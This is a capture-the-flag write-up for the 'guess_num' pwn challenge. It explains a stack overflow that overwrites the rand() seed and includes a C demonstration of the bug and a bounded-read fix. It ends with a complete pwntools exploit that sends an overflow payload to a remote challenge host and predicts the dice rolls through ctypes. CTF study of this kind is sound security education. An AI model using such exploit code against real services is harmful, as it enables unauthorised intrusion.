攻防世界 guess_num writeup

0x01 Finding the vulnerability

checksec
kk@ubuntu:~/Desktop/black/GFSJ/guess_num$ checksec guess_num
[*] '/home/kk/Desktop/black/GFSJ/guess_num/guess_num'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
IDA analysis

There is a stack overflow at the spot marked by the arrow. Stepping into sub_C3E shows that once its condition holds, the flag is printed:


cat flag

0x02 Approach

Looking at the stack frame of v7:

-0000000000000030 var_30          db ?
-000000000000002F                 db ? ; undefined
-000000000000002E                 db ? ; undefined
-000000000000002D                 db ? ; undefined
-000000000000002C                 db ? ; undefined
-000000000000002B                 db ? ; undefined
-000000000000002A                 db ? ; undefined
-0000000000000029                 db ? ; undefined
-0000000000000028                 db ? ; undefined
-0000000000000027                 db ? ; undefined
-0000000000000026                 db ? ; undefined
-0000000000000025                 db ? ; undefined
-0000000000000024                 db ? ; undefined
-0000000000000023                 db ? ; undefined
-0000000000000022                 db ? ; undefined
-0000000000000021                 db ? ; undefined
-0000000000000020                 db ? ; undefined
-000000000000001F                 db ? ; undefined
-000000000000001E                 db ? ; undefined
-000000000000001D                 db ? ; undefined
-000000000000001C                 db ? ; undefined
-000000000000001B                 db ? ; undefined
-000000000000001A                 db ? ; undefined
-0000000000000019                 db ? ; undefined
-0000000000000018                 db ? ; undefined
-0000000000000017                 db ? ; undefined
-0000000000000016                 db ? ; undefined
-0000000000000015                 db ? ; undefined
-0000000000000014                 db ? ; undefined
-0000000000000013                 db ? ; undefined
-0000000000000012                 db ? ; undefined
-0000000000000011                 db ? ; undefined
-0000000000000010 seed            dd 2 dup(?)

var_30 occupies 0x20 bytes on the stack, and seed sits directly after it, so an overly long name overwrites seed.
If each guess we enter (v4) equals the random number (v6), the program runs cat flag.

0x03 Attack

About rand and srand

The numbers produced by the random function are not truly random: they are only random within a certain range and are in fact a repeating cycle of numbers determined by the random seed. Before calling rand(), the seed must be set with srand(); if no seed has been set, rand() behaves as if the seed were 1.
For this challenge, setting the seed to either 0 or 1 works; write the script following the loop in the binary.
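The two facts above (the name buffer sits directly below seed, and a known seed makes every roll predictable) can be checked locally without the challenge binary. The following C program is an added example written for this writeup, not code from the challenge or the original post: it models the frame from the IDA listing (0x20 bytes of name, then an 8-byte seed), feeds it the same 40-byte input the exploit sends (constructed here), and contrasts the unbounded copy with a bounded one. Function and struct names are hypothetical.

```c
/* Added example (not the challenge binary or the writeup's own code).
 * Models the frame from the IDA listing: a 0x20-byte name buffer directly
 * below the 8-byte seed. Shows (a) how an unbounded read clobbers the seed,
 * (b) how a bounded read keeps it intact, and (c) why a known seed makes
 * every rand() roll reproducible. All names are hypothetical. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct frame {
    char name[0x20];        /* var_30: 0x20 bytes */
    unsigned int seed[2];   /* seed: dd 2 dup(?) -> 8 bytes right after it */
};

#define SEED_BEFORE 0x1234u   /* arbitrary seed value set by the "program" */

/* Builds the 40-byte input the writeup sends: 0x20 filler bytes followed by
 * the 8 bytes of p64(1). Constructed test input. Returns the length. */
static size_t build_overflow_input(unsigned char *out, size_t cap) {
    uint64_t one = 1;
    if (cap < 0x20 + sizeof one) return 0;
    memset(out, 'a', 0x20);
    memcpy(out + 0x20, &one, sizeof one);  /* same bytes as p64(1) on x86-64 */
    return 0x20 + sizeof one;
}

/* Vulnerable pattern: the whole input is written starting at name with no
 * regard for the buffer's size (what gets()/an unchecked read does).
 * The copy is capped at the object's size only to keep the demo defined. */
static void read_name_unbounded(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof *f) n = sizeof *f;
    memcpy(f, in, n);
}

/* Hardened pattern: copy at most sizeof(name)-1 bytes and NUL-terminate,
 * the same bound fgets(name, sizeof name, stdin) would apply. */
static void read_name_bounded(struct frame *f, const unsigned char *in, size_t n) {
    size_t max = sizeof f->name - 1;
    if (n > max) n = max;
    memcpy(f->name, in, n);
    f->name[n] = '\0';
}

/* seed[0] after the overflow input goes through the unbounded reader. */
unsigned int seed_after_unbounded_read(void) {
    struct frame f;
    unsigned char in[64];
    size_t n = build_overflow_input(in, sizeof in);
    f.seed[0] = SEED_BEFORE; f.seed[1] = 0;
    read_name_unbounded(&f, in, n);
    return f.seed[0];   /* 1: the input now decides the seed */
}

/* seed[0] after the same input goes through the bounded reader. */
unsigned int seed_after_bounded_read(void) {
    struct frame f;
    unsigned char in[64];
    size_t n = build_overflow_input(in, sizeof in);
    f.seed[0] = SEED_BEFORE; f.seed[1] = 0;
    read_name_bounded(&f, in, n);
    return f.seed[0];   /* SEED_BEFORE: the name was truncated instead */
}

/* Fills out[] with the n rolls rand()%6+1 produced after srand(seed). */
void predict_rolls(unsigned int seed, int *out, int n) {
    srand(seed);
    for (int i = 0; i < n; i++) out[i] = rand() % 6 + 1;
}

/* 1 if two runs with the same seed yield identical rolls (they must). */
int rolls_are_reproducible(unsigned int seed, int n) {
    int a[64], b[64];
    if (n > 64) n = 64;
    predict_rolls(seed, a, n);
    predict_rolls(seed, b, n);
    return memcmp(a, b, n * sizeof a[0]) == 0;
}

/* 1 if every predicted roll lies in 1..6, else 0. */
int rolls_in_range(unsigned int seed, int n) {
    int r[64];
    if (n > 64) n = 64;
    predict_rolls(seed, r, n);
    for (int i = 0; i < n; i++)
        if (r[i] < 1 || r[i] > 6) return 0;
    return 1;
}

int main(void) {
    int r[10];
    printf("seed after unbounded read: %u\n", seed_after_unbounded_read());
    printf("seed after bounded read:   %#x\n", seed_after_bounded_read());
    predict_rolls(1, r, 10);
    printf("rolls for seed 1:");
    for (int i = 0; i < 10; i++) printf(" %d", r[i]);
    printf("\n");
    return 0;
}
```

The bounded reader is the fix a reviewer would ask for: once the copy cannot pass the end of name, the seed keeps whatever the program chose, and the attacker's only remaining route is guessing. The rolls themselves are printed for inspection only; their exact values depend on the libc, which is why the exploit loads the target's own libc rather than hard-coding them.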

About the ctypes library and shared libraries

We use the ctypes module from the Python standard library to call C code from Python.

The libc shared library

It can be located with ldd:

kk@ubuntu:~/Desktop/black/GFSJ/guess_num$ ldd guess_num 
    linux-vdso.so.1 =>  (0x00007ffd3f5a0000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1e6c0b0000)
    /lib64/ld-linux-x86-64.so.2 (0x00007f1e6c67d000)

It can also be looked up from the ELF file inside the script:

elf = ELF('./guess_num')
libc = elf.libc
The exploit is as follows:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from ctypes import cdll

io = remote('111.198.29.45', 45742)
# io = process('./guess_num')

#elf = ELF('./guess_num')
#libc = elf.libc

# load the same libc the target uses so rand() yields the same sequence
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
# 0x20 bytes fill var_30; the next 8 bytes land on seed (p64(1) -> seed = 1)
payload = b"a" * 0x20 + p64(1)
io.recvuntil(b'your name:')
io.sendline(payload)
# reproduce the target's sequence with the same seed
libc.srand(1)
for i in range(10):
    num = str(libc.rand() % 6 + 1)
    io.recvuntil(b'number:')
    io.sendline(num.encode())

io.interactive()
